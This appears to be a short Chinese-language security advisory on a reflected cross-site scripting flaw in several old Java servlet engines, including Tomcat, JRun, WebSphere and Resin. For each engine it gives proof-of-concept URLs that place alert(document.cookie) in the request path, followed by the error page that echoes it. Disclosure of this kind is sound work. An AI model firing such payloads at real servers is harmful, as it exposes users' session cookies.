Java Servlet 包含有交叉站点的脚本漏洞

多家厂商的 多家厂商的 Java Servlet 包含有交叉站点的脚本漏洞。
br> ===========================================
受到影响的产品有：
=================

Tomcat 3.2.1, 3.2.2-beta, 4.0-beta

JRun 3.0 WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional

不受影响的产品，目前还没有发现。

漏洞：
=======

采用下面的 URL，在浏览器上的 JavaScript 代码可以在服务器的域上执行。

Tomcat 3.2.1: http://Tomcat/jsp-mapped-dir/alert(document.cookie).jsp
JRun 3.0: http://JRun/alert(document.cookie).shtml http://JRun/alert(document.cookie).jsp http://JRun/alert(document.cookie).thtml
WebSphere 3.5 FP2:
http://WebSphere/webapp/examples/alert(document.cookie)
WebSphere 3.02:
http://WebSphere/alert(document.cookie).jsp VisualAge for Java 3.5 Professional:
http://VisualAge-WebSphere-Test-Environment/alert(document.cookie) Resin 1.2.2:
http://Reisin/alert(document.cookie).jsp http://www.caucho.com/document.write(document.cookie).jsp 这些页面的输出如下 ================================================= Error 404 An error has occurred while processing request: http://WebSphere/webapp/examples/****** Message: File not found: file://****** StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://****** at javax.servlet.ServletException.(ServletException.java:107) at com.ibm.websphere.servlet.error.ServletErrorReport.(ServletErrorReport.java:31) at com.ibm.servlet.engine.webapp.WebAppErrorReport.(WebAppErrorReport.java:20) at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97) ... ================================================= ******: The JavaScript code is executed here.

这些漏洞和微软于去年 8月 25 日发布的 IIS 的交叉站点漏洞脚本很相似